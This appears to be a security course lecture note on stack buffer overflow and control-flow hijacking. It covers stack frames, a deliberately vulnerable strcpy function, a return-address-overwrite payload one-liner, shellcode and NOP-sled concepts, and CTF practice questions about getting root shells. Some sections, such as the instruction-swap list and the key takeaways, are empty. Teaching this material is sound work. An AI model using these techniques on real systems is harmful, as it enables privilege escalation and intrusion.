Control-Flow Hijacking

A program's control flow is the order in which its instructions execute. Control-flow hijacking is an attack that bends that order to the attacker's will — making the program run code it was never supposed to run. The classic way in is a stack buffer overflow: the program copies attacker-controlled input into a fixed-size stack buffer without checking its length, and the overflow clobbers the control data sitting next to that buffer.

This is not a museum piece. "Out-of-bounds Write" (CWE-787) was #1 on the 2023 CWE Top 25, and the technique dates to the Morris worm (1988) and the canonical 1996 write-up "Smashing the Stack for Fun and Profit." Memory-unsafe C/C++ keeps it alive.

Background: the run-time stack

To see why an overflow is dangerous, you need to know what lives next to a buffer. On x86 the stack grows downward (toward lower addresses). Each function call builds a stack frame. In 32-bit conventions the frame, relative to the frame-base pointer %ebp, looks like this:

Address Contents
%ebp + 8 first argument passed in by the caller
%ebp + 4 saved return address (where ret jumps back to)
%ebp + 0 saved %ebp of the caller
%ebp - … local variables and buffers (negative offsets)

Key registers: %esp points at the top of the stack, %ebp anchors the current frame, and %eip (the instruction pointer) holds the address of the next instruction to execute. The typical function prolog sets this up:

push %ebp          ; save caller's frame base
mov  %esp, %ebp    ; establish new frame base
sub  $0x24, %esp   ; reserve space for locals

The crucial fact: local buffers sit at lower addresses than the saved return address. Because a C string copy writes upward from the start of the buffer, an over-long write marches straight toward — and over — the saved %ebp and the return address.

The vulnerability

#define SIZE 16
int vul(char *input) {
    char buf[SIZE];
    strcpy(buf, input);   // no bounds check!
    return 0;
}

strcpy copies bytes until it hits a NUL terminator. It has no idea how big buf is. If input is longer than 16 bytes, the extra bytes overflow buf and overwrite whatever is above it on the stack. Functions like gets, sprintf, and unbounded scanf share this flaw.

Escalating the attack

The lecture builds the attack in three levels of increasing power.

Level 1 — Overwrite an adjacent variable. Suppose a local int flag sits just above buf. Overflowing buf lets you flip flag from 0 to nonzero and pass a check you weren't supposed to pass. You've changed data, not yet control flow.

Level 2 — Overwrite a function pointer. Now the function holds void (*fp)() = dummy; and later calls fp(). Overflow buf to overwrite fp with the address of a target() function (say one that calls execve("/bin/sh", …)). When the program does fp(), it jumps to your chosen target. This is genuine control-flow hijacking via an indirect call.

Level 3 — Overwrite the return address. What if there's no convenient function pointer? Every function still has one piece of control data on the stack: the saved return address. Overflow past buf, past the saved %ebp, and write your target address into the return-address slot (%ebp + 4). When the function executes ret, it pops that slot into %eip — and execution continues wherever you pointed it.

[ buffer ][ saved ebp ][ return address ][ args ]
 AAAA...AAAA  AAAA          <target addr>

If target() runs execve("/bin/sh", …), you get a shell. And if the vulnerable program is Set-UID root, that shell inherits root's privileges — a textbook privilege escalation (exactly the goal of the course CTF).

Endianness matters. x86 is little-endian, so an address 0x080491a6 is written in the payload as the bytes \xa6\x91\x04\x08.

Finding the return address (the offset)

To overwrite the return address you must know how many bytes of padding come before it. Three methods:

  1. Read the assembly — disassemble the function and compute the buffer offset from the prolog (sub $0x..,%esp).
  2. Inspect the stack in GDB/pwndbg — set a breakpoint, examine memory, find where the buffer ends and the return slot begins.
  3. Use a cyclic pattern (pwntools)cyclic 100 emits a De Bruijn sequence where every 4-byte window is unique. Feed it as input; the program crashes with those 4 unique bytes in %eip (e.g. *EIP 0x61616174 ('taaa')). Then cyclic -l taaa reports the index of that substring — which is exactly the offset from the buffer to the return address.

A handy way to deliver a raw binary payload on the command line:

./prog $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*32 + b'\xa6\x91\x04\x08')")

Code injection: shellcode

Levels 2 and 3 reused code already in the program. But what if there's no target() to jump to? Then the attacker injects their own machine code ("shellcode") into the buffer and points the return address at it.

Shellcode usually invokes a system call directly — the interface user programs use to ask the kernel for services. On 32-bit Linux you trigger one with int $0x80 (64-bit uses the syscall instruction). The convention for int $0x80 is:

%eax %ebx %ecx %edx
syscall number arg 1 arg 2 arg 3

To spawn a shell with execve("/bin/sh", NULL, NULL) you set %eax = 0x0b (sys_execve), point %ebx at the "/bin/sh" string (built on the stack), zero %ecx/%edx, and execute int $0x80.

Two practical obstacles

No NULL bytes. Because strcpy (and friends) stop at the first \x00, the shellcode bytes must contain no zero bytes or the copy truncates mid-payload. So attackers swap instructions for zero-free equivalents that do the same thing:

Not knowing the exact landing address. Stack addresses can shift, so guessing the precise shellcode address is fragile. The fix is a NOP sled: prepend many nop (no-op) instructions, then the shellcode, then the return address. As long as %eip lands anywhere in the sled, execution slides down the NOPs into the shellcode:

[ nop nop nop … nop ][ shellcode ][ … ][ return address → somewhere in the sled ]

Key takeaways

Practice

  1. Which direction does the x86 run-time stack grow as new frames are pushed?
  2. In a typical 32-bit stack frame, what is stored at %ebp + 4?
  3. Why is strcpy(buf, input) dangerous when buf is a fixed-size stack array?
  4. An attacker overflows a local buffer and overwrites the saved return address with the address of target(). What happens when the vulnerable function executes ret?
  5. In 32-bit Linux shellcode that invokes a system call with int $0x80, which register holds the system-call number?
  6. Why must execve shellcode delivered through strcpy() contain no NULL (\x00) bytes?
  7. What problem does a NOP sled (nop nop … [shellcode] … [ret addr]) solve in a stack overflow exploit?
  8. The 2023 CWE Top 25 ranks which weakness #1 — the class that classic stack buffer overflows belong to?
  9. Using pwntools, explain how cyclic together with cyclic -l lets you find the exact offset from the start of the buffer to the saved return address.
  10. The CTF binaries are Set-UID root programs with a stack buffer overflow. Explain why hijacking control flow to run execve("/bin/sh", …) gives you a root shell.